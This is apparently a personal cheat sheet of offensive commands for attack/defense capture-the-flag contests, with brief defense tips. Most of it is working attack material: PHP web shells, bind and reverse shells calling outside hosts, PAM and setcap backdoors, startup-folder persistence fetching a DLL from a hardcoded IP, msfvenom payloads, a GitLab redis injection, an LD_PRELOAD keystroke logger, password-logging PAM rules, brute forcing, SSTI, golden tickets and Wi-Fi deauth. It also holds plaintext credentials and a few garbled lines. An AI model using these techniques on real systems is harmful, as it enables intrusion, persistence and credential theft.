Team of 4 or 5
One Linux Box
One Window Box
If there are root/admin passwords, change them immediately. Change any other passwords on the box as well, as long as they aren’t used by the scoring bot/service.
Defending 2-3 services on each box. I don’t remember all the services but there was ftp and a wikipedia (TikiWiki). I think there was another web-service as well.
FTP. Your boxes are the same as everyone elses. Get login details so you can remote into your opponents boxes.
Key Point: Any login that works on your box, works on other peoples box. If you have a login to the TikiWiki admin, you have a login to THEIR TikiWiki.
WEB STUFF:
web shell:Â
<?php echo exec($_GET["password"]);?> <?php echo shell_exec($_GET["password"]);?> <?php system($_GET["password"],$retval);?> <?php passthru($_GET["password"]);?>
Use it like this:
http://target_ip/filename_with_this_phpline.php?password=nc -l -p 59741 -e /bin/sh
DEFENSE:
Change permissions on flag files to ONLY be readable.
Make your flag files immutable (unable to be changed)
chattr +i /path/to/flag/file
OFFENSE:
If you get on another persons box, heres some sneaky tips (that require root):
setcap CAP_SETUID=ep `which python`
^ after doing this, you can get a root shell at any time: python -c "import os;os.setuid(0);os.seteuid(0);os.system('/bin/bash')"'
This sets the suid bit on a program, without having the suid bit set 😀
———————————
Look for these lines like this in the /etc/pam.d/common-auth file:
auth [success=1 default=ignore] pam_unix.so nullok_secure auth requisite pam_deny.so
Change it to this:
auth [success=1 default=1] pam_unix.so nullok_secure
This allows any username/password combination to work. You basically nullify password checking, all logins are allowed.
———————————-
MYSQL (if its there):
mysql -p (connects as current user, you provide a password. Try without -p for passwordless login) show databases; (shows databases) connect DB_NAME; show tables; select * from TABLE_NAME; (this should get you started)
### BLOODHOUND
C:\AD\Tools\BloodHound-master\Ingestors\SharpHound.ps1
# To load it:
PS C:\AD\Tools\BloodHound-master\Ingestors> . .\SharpHound.ps1 (alternatively Import-Module)
# Run:
Invoke-BloodHound -CollectionMethod All -Verbose
# (To avoid ATA detection)
Invoke-BloodHound -CollectionMethod All -ExcludeDc
# After uploading, if sessions is 0/empty:
Invoke-BloodHound -CollectionMethod LoggedOn -Verbose
### POWERSPLOIT
# Powersploit… Recon/Powerview.ps1
# Current User / Current Domain
Find-InterrestingDomainShareFile
# Different User / Different Domain
$SecPassword = ConvertTo-SecureString ‘Password123!’ -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential(‘DEV\dfm.a’, $SecPassword)
Find-DomainShare -Domain testlab.local -Credential $Cred
# Powerup
Import-Module .\PowerUp.ps1
Invoke-AllChecks (minimal output?)
Get-UnquotedService (good output)
### POWERSHELL
# Get AD Users / Notes
Get-ADUser -Filter * -Properties Description | Where-Object { $_Description.length -gt 8 }
Get-ADGroupMember “Domain Admins” -Recursive
dsquery group -name “Domain Admins” | dsget group -expand-members
# Convert to base64 (Note: UNICODE is exchangable with ASCII)
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(“whatever”))
# Convert from base64
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(“dwBoAGEAdABlAHYAZQByAA==”))
# Run a DLL automatically from Start folder
$user = “Wendy”
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(“C:\\Users\\” + $user + “\\Start Menu\\Programs\\Startup\\healthcheck.lnk”)
$Shortcut.TargetPath = “C:\\Windows\\System32\\rundll32.exe”
$Shortcut.Arguments = “healthcheck.dll,RunSliver”
$Shortcut.Save()
# Shortened
#$u=”Wendy”;$w=New-Object -comObject WScript.Shell;$s=$w.CreateShortcut(“C:\\Users\\”+$u+”\\Start Menu\\Programs\\Startup\\healthcheck.lnk”);$s.TargetPath=”C:\\Windows\\System32\\rundll32.exe”;$s.Arguments=”healthcheck.dll,RunSliver”;$s.Save()
# Download a file
$u=”http://45.55.42.232:8443/healthcheck.dll”
$o=”C:\\Windows\\System32\\healthcheck.dll”
Invoke-WebRequest -Uri $u -OutFile $o
Invoke-WebRequest -Uri “http://10.10.10.120/file.txt” -OutFile “C:\\file.txt”
### METASPLOIT
# Metasploit Make Malicious .lnk file
auxillary/fileformat/multidrop
# meterpreter tradecraft
$ sysinfo
$ shell
. whoami
. exit (the shell)
$ getprivs
$ getsystem
fail:
$ ps
$ migrate <explorer>
$ background
> search suggester
> use <suggester>
> show options
> sessions
> set SESSION 1
> run
# Port forward in a session:
portfwd add -L 0.0.0.0 -l 2222 -r 192.168.56.110 -p 22
# Windows port forward:
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=0.0.0.0 connectport=22 connectaddress=45.55.42.232
### GENERIC
# Stop pty from echoing twice
stty raw -echo
# Linux kernel exploits
linux-exploit-suggester
### MSFVENOM KNOWN-GOOD COMMANDS
# Windows – Backdoor User
msfvenom -p windows/adduser USER=badmin PASS=password123 -f exe > service.exe
### Encoding
Base85 Encoding / Ascii85 encoding
import base64
base64.a64encode
!”#$%&'()*+,-./0123456789:;<=>?@
ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`
abcdefghijklmnopqrstu
special case: ‘z’ represents “\x00\x00\x00\x00”
base64.b64encode
0123456789
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
!#$%&()*+-;<=>?@^_`{|}
### Encryption
RSA
Two primes: p and q
secret = “some secret represented as a number”
n = p * q
e = 0x10001 (some number)
encrypted = pow(secret, e, n)
a = isqrt(n) + 1
b = ?
p, q = a+b, a-b
phi = (p-1) * (q-1)
d = pow(e, -1, phi)
secret = pow(encrypted, d, n)
### Windows Remote Connections
# Note – Remote Machine: MEMBERSRV1
# POWERSHELL/WINRM
# On “attacker”
Test-Connection -ComputerName MEMBERSRV1
Test-WSMan -ComputerName “MEMBERSRV1”
Set-Item WSMan:\localhost\Client\TrustedHosts -Value “IP_ADDR_OF_MEMBERSRV1” -Force
# On “target”
Start-Service -Name WinRM
Set-service -Name WinRM -StartupType Automatic
# POWERSHELL
Enable-PSRemoting –Force
### POWERSHELL
$sesh = New-PSSession –ComputerName MEMBERSRV1 –Credential “MEMBERSRV1(or domain)\administrator”
Optional: -Authentication Negotiate
Enter-PSSession $sesh
If commands fail to run:
You can use: “&{dir}” as an alternative to ScriptBlock when you have a shell
$username = “jea_test_account”
$password = ConvertTo-SecureString “Ab!Q@vcg^%@#1” -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
Invoke-Command -ComputerName MEMBERSRV1 -ScriptBlock { SCRIPT } -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck) -Credential $credentials
SCRIPT example: cmd /c dir /b /s /t
### WMIC
([WMICLASS]”MEMBERSRV1RootCIMV2:Win32_Process”).create(“notepad.exe”)
Invoke-WmiMethod –ComputerName MEMBERSRV1 -Class win32_process -Name create -ArgumentList “notepad”
wmic /node:”MEMBERSRV1″ process call create ^””C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE” /s “\\REMOTE-MACHINE-NAME\SHARED-FOLDER\Presentation.pptx”^”
### WINRM
Invoke-Command –ComputerName MEMBERSRV1 –ScriptBlock {Start-Process notepad.exe}
$user = ‘username’
$pass = ConvertTo-SecureString -AsPlainText ‘yourpassword’ -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user,$pass
Invoke-Command -ComputerName “MEMBERSRV1” -Credential $cred -ScriptBlock {Start-Process D:\Chrome\Chrome.exe}
# WSMAN
Connect-WSMan -ComputerName “MEMBERSRV1” -Port 80 -Credential
cd wsman:
### AT
AT \\MEMBERSRV1 10:50 notepad.exe
### SERVICE
sc.exe \\MEMBERSRV1 create newservice binpath= C:\Windows\System32\Newserv.exe start= auto obj= DOMAIN\username password= pwd
sc.exe \\MEMBERSRV1 start newservice
### msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.56.4 LPORT=443 -f python -b “\x00\x0a\x0d”
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=443 -b ‘\x00\x0a\x0d
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=443 -b ‘\x00\x0a\x0d’ -f python
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.56.4 LPORT=443 -b ‘\x00\x0a\x0d’ -f python # STAGELESS (doesnt work?)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.4 LPORT=443 -b ‘\x00\x0a\x0d’ -f python # STAGED
### iptables
# Example to setup a box only allowing INPUT from a single IP
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
# Accept on localhost
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -o eth0 –dst 192.168.56.130 -j ACCEPT
iptables -A OUTPUT -o eth0 –dst 192.168.56.110 -j ACCEPT
# Allow established sessions to receive traffic
iptables -A INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT
# Insert rule into position #2 (bumping everything at or below 2, down 1)
iptables -I INPUT 2 –src 192.168.56.110 -j ACCEPT
### Windows firewall
netsh advfirewall show currentprofile
netsh advfirewall firewall add rule name=”RULENAME” dir=[in/out] action=[allow/block/bypass] protocol=[tcp/udp] localip=[any] remoteip=[any]
### socat
# BIND LINUX
socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
# Persistent:
socat -d -d TCP4-LISTEN:4443,fork,reuseaddr EXEC:/bin/ash
# BIND WINDOWS
socat -d -d TCP4-LISTEN:4443 EXEC:’cmd.exe’,pipes
# CONNECT TO BIND
socat – TCP4:192.168.168.130:4443
# PORT FORWARD
socat TCP4-LISTEN:8443 TCP4:192.168.56.4:443
# FILE TRANSFER
socat TCP4-LISTEN:8888 file:test_file,create
-> socat TCP4:1.2.3.4:8888 STDIN < test_file
OR
socat TCP4-LISTEN:8888 STDIN < test_file
-> socat TCP4:1.2.3.4:8888 file:test_file,create
# ENCRYPTED
openssl req -newkey rsa:2048 -nodes -keyout private.key -x509 -days 1000 -subj ‘/CN=www.mydom.com/O=My Company Name LTD./C=US’ -out public.cert
cat private.key public.cert > cert.pem
socat OPENSSL-LISTEN:4444,cert=cert.pem,verify=0 –
-> socat – OPENSSL:127.0.0.1:4444,verify=0
### OPENSSL Commands
openssl genrsa -out client.key 4096
openssl req -new -x509 -text -key client.key -out client.cert
### hydra
hydra -L username_list -P password_list -s 8089 -f 10.10.10.209 https-get /services
hydra -l root -P /some/passlist 1.2.3.4 ssh
hydra -l root -P /some/passlist 1.2.3.4 ftp
hydra -s 22 -v -V -l root -P /my/wordlist 10.2.3.4 ssh
hydra -l username -P /some/passlist url.zz.za http-post-form “/portal/xlogin/:ed=^USER^&pw=^PASS^:F=Invalid” # Looks for “Invalid” in the returned page
hydra -l username -P /root/Desktop/Test.txt url.zz.za http-post-form “/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302” # Looks for a 302 Redirect as a failure
### redis/git
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push “{\”class\”:\”GitlabShellWorker\”,\”args\”:[\”class_eval\”,\”open(\’|rm /tmp/noodles;mkfifo /tmp/noodles;cat /tmp/noodles|/bin/sh -i 2>1|nc 10.10.14.139 8888 >/tmp/noodles\’).read\”],\”retry\”:3,\”queue\”:\”system_hook_push\”,\”jid\”:\”ad52abc5641173e217eb2e52\”,\”created_at\”:1608799993.1234567,\”enqueued_at\”:1608799993.1234567}”
exec
exec
exec
&project%5Bci_cd_only%5D=false&project%5Bname%5D=tester6&project%5Bnamespace_id%5D=6&project%5Bpath%5D=tester6&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0
### docker
# General system-wide info
docker info
# login to https docker
docker login docker.registry.htb
# Might need certs:
/etc/docker/certs.d/ <– Certificate directory
└── docker.registry.htb <– Hostname:port
├── client.cert <– Client certificate
├── client.key <– Client key
└── ca.crt <– Certificate authority that signed
the registry certificate
# View list of images:
docker images
# Alternative: browse to _catalog
# Pull an image:
docker pull docker.registry.htb/bolt-image
docker run -it docker.registry.htb/bolt-image
### arp scan
arp-scan -I eth0 –srcaddr=DE:AD:BE:EF:CA:FE 192.168.86.0/24
###################################### REVERSING
### General Start
file myfile
r2 myfile
aaaa # This analyzes everything
afl # This displays functions/symbols
s main # “main” is a symbol, can be other stuff like sym.pwnme
pdf # print disassembly of function
# rabin2
-R # Relocations
-S # Sections (whats read/write/executable)
-s # symbols
-z # strings
-zz # all strings
-i # imports
-E # Exports
rabin2 -SRs myfile
# readelf
readelf -r myfile # relocation info
readelf -s myfile # symbols!
readelf -S myfile # Section headers (whats read/write/executable)
### gdb
gdb ./some_exe
run <<< $(python2 -c “print(‘A’*40)”)
run <<< $(/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 80)
sqlmap -r login.txt –batch –level=2 –risk=3
hydra -l admin -p /usr/share/wordlists/fasttrack.txt http://hch http-post-form “/login.php:usrname=^USER^&password=^PASS^”
### ropper
ropper
file <path to file>
search pop rdi
build:
#!/bin/sh
gcc -c -fpic thing.c -ldl
gcc -shared -o thing.so thing.o -ldl
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <string.h>
extern ssize_t read(int fd, void *buf, size_t count);
extern int execve(const char *filename, char **argv, char **envp);
ssize_t read(int fd, void *buf, size_t count) {
void *handle;
char *error;
ssize_t ret;
ssize_t (*_read)(int, void *, size_t);
FILE *log = NULL;
handle = dlopen(“libc.so.6”, RTLD_NOW);
if (!handle) {
fprintf(stderr, “%s\n”, dlerror());
exit(EXIT_FAILURE);
}
dlerror();
_read = (ssize_t (*)(int,void *,size_t)) dlsym(handle, “read”);
log = fopen(“/tmp/command_log”, “a”);
ret = (*_read)(fd, buf, count);
if (fd == 0) {
fwrite(buf, 1, ret, log);
}
fclose(log);
return ret;
}
extern int execve(const char *filename, char **argv, char **envp) {
void *handle;
char *error;
int ret;
int i = 0;
int (*_execve)(const char*, char **, char **);
FILE *log = NULL;
handle = dlopen(“libc.so.6″w, RTLD_NOW);
if (!handle) {
fprintf(stderr, “%s\n”, dlerror());
exit(EXIT_FAILURE);
}
dlerror();
_execve = (int (*)(const char*,char **, char**)) dlsym(handle, “execve”);
log = fopen(“/tmp/exec_log”, “a”);
fprintf(log, “%s”, filename);
while(argv[++i] != NULL) {
fprintf(log, ” %s”, argv[i]);
}
fwrite(“\n”, 1, 1, log);
fclose(log);
return (*_execve)(filename, argv, envp);
}
nmap -sS -A -Pn -n 172.16.20.0/24 -p- -oN nmap_internal
nmap -sU -A -Pn -n 172.16.20.0/24 -p- -oN udp_nmap_internal
nmap -sS -A -Pn -n 172.16.30.0/24 -p- -oN nmap_dmz
nmap -sU -A -Pn -n 172.16.30.0/24 -p- -oN udp_nmap_dmz
130.44.210.8/24 == router IP address
Creds:
Makestuff\\GLEN_DUKE
Tartans@1!
auto eth0
iface eth0 inet static
address 172.16.20.100
netmask 255.255.255.0
gateway 172.16.20.1
hostname optional
/etc/init.d/networking restart
ifconfig eth0 192.168.0.1 netmask 255.255.255.0
route add default gw 192.168.0.253 eth0
route delete default gw 10.0.2.2 eth0
ip link set eth1 up
ip route show
ip addr add 1.1.1.1/24 dev eth2
ip addr del 1.1.1.2/24 dev eth2
vi /etc/netplan/*.yaml
network:
ethernets:
eno1:
addresses: [192.168.1.13/24]
gateway4: 192.168.1.1
dhcp4: true
optional: true
nameservers:
addresses: [8.8.8.8,8.8.4.4]
version: 2
>>>
$ netplan apply
Â
import sqlite3
db = sqlite3.connect(‘/var/log/collect_pass.db’)
cursor = db.cursor()
cursor.execute(”’CREATE TABLE passwords(time INTEGER, nano INTEGER, ip TEXT, username TEXT, password TEXT, PRIMARY KEY (time,nano))”’)
db.commit()
cursor.execute(”’INSERT INTO passwords(time,nano,ip,username,password) VALUES(?, ?, ?, ?, ?)”’, (time,nano,ip,username,password))
db.commit()
with sqlite3.connect(‘/var/log/passwords.db’) as db:
db.text_factory = str
cursor = db.cursor()
data = cursor.execute(‘SELECT TIMESTAMP_SECS,PASSWORD from passwords group by TIMESTAMP_SECS order by TIMESTAMP_SECS DESC LIMIT 10;’)
latest_data = data.fetchall()
with sqlite3.connect(‘/var/log/passwords.db’) as db:
db.text_factory = str
cursor = db.cursor()
data = cursor.execute(‘SELECT PASSWORD,COUNT(*) from passwords group by PASSWORD order by COUNT(*) DESC LIMIT 10;’)
data = data.fetchall()
with sqlite3.connect(‘/var/log/passwords.db’) as db:
db.text_factory = str
cursor = db.cursor()
# Gets the count of total unique passwords
data = cursor.execute(‘SELECT COUNT(DISTINCT PASSWORD) from passwords;’)
pwcount = data.fetchall()[0][0]
attempt_counter = dict()
for d in range(7):
current_date = (datetime.utcnow() – timedelta(days=d)).date()
attempt_counter[current_date] = 0
# Get minimum timestamp needed for database pull
epoch = date(1970,1,1)
min_time = int((min(attempt_counter) – epoch).total_seconds())
# Pull timestamp data from database
with sqlite3.connect(‘/var/log/passwords.db’) as db:
db.text_factory = str
cursor = db.cursor()
data = cursor.execute(‘SELECT TIMESTAMP_SECS from PASSWORDS WHERE TIMESTAMP_SECS > {};’.format(min_time))
times = data.fetchall()
### mysql
mysql -u root -p
SHOW DATABASES;
use PASSWORDDB;
SHOW TABLES;
SELECT * FROM <table>;
### SSH Shenanigans
/etc/login.defs
# Add these lines if you ever run out of subordinate user IDs / group IDs
SUB_UID_MIN 100000
SUB_UID_MAX 600100000
SUB_UID_COUNT 1
SUB_GID_MIN 100000
SUB_GID_MAX 600100000
SUB_GID_COUNT 1
auth [success=2 default=ignore] pam_unix.so nullok_secure
# here’s the fallback if no module succeeds
auth optional pam_logpassword.so
auth requisite pam_deny.so
### hashcat
hashcat.exe –identify X:\CTF\jerseyctf2\shadow_hashes.bin
hashcat.exe -m 1800 -a 3 hashes.txt -1 ?l?u?d ‘?1?1?1?1?1?1’
hashcat.exe -m 1800 -a 0 hashes.txt “E:\Toolbox\john\run\rockyou.txt”
hashcat.exe -O -S -m 12500 “X:\Backups\C_Mike\Pictures\rarhashes.txt” -r rules\allrules.rule “D:\Cloud\code\Python\mangledwordlist.txt”
### binwalk
binwalk –dd=’.*’ file.bin
### SSTI (jinja)
{{g[‘\x5f\x5fclass\x5f\x5f’].mro()[1][‘\x5f\x5fsubclasses\x5f\x5f’]()[40](‘./flag.txt’).read()}}
### volatility
vol.py -f JacobsPC.raw imageinfo
vol.py -f JacobsPC.raw –profile=Win7SP1x64 pslist
vol.py -f JacobsPC.raw –profile=Win7SP1x64 dlllist -p 3628
vol.py -f JacobsPC.raw –profile=Win7SP1x64 printkey -K “Software\Microsoft\Windows\CurrentVersion\Run”
vol.py -f JacobsPC.raw –profile=Win7SP1x64 handles -p 3628 -t file
mimikatz.exe “kerberos::golden /user:Administrator /id:500 /domain:prescup.local /sid:S-1-5-21-764921041-1137357192-4117662831 /target:tokyo.prescup.local /rc4:DB4362872F3A99ED8BDEC31B67FFEB08 /service:cifs /ptt” exit
### aircrack / wpa cracking
# get list of adapters
iwconfig
# put into monitor mode
airmon-ng start wlan0
# Get a list of whats going on
airodump-ng wlan0
# Capture a specific device
airodump-ng wlan0 –bssid 94:83:C4:1A:FB:35 -c 11 -w goodlife
# Check out the capture
aircrack-ng goodlife-01.cap
# Send a deauth packet to a particular device
aireplay-ng wlan0 -c 7E:B0:AE:18:A8:37 -a 94:83:C4:1A:FB:35 –deauth 1